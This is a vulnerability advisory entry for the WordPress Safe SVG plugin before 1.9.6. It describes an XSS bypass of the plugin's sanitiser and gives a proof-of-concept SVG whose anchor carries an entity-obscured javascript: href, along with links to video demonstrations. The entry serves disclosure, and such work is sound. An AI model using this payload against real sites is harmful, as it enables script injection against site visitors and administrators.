WordPress Plugin Vulnerabilities
Safe SVG < 1.9.6 - XSS Protection Bypass
Description
By using entities in payload XSS will success to bypass the protection of the Safe SVG Plugin
Proof of Concept
Video POC (for <= 1.9.4): https://drive.google.com/open?id=19-sin0HB97L0tPMUAaGjgE5KjP4lXSuw Create a SVG with payload below to trigger XSS: ```<?xml version="1.0" standalone="no"?> <svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"> <a href="javascript :alert(1)"> <circle cx="50" cy="40" r="35"/> </a> </svg> ``` Video PoC for v1.9.5 : https://www.youtube.com/watch?v=hnQA2hc-4_k
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
0xd0ff9
Submitter
0xd0ff9
Submitter website
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2019-11-08 (about 4 years ago)
Added
2019-11-08 (about 4 years ago)
Last Updated
2019-11-28 (about 4 years ago)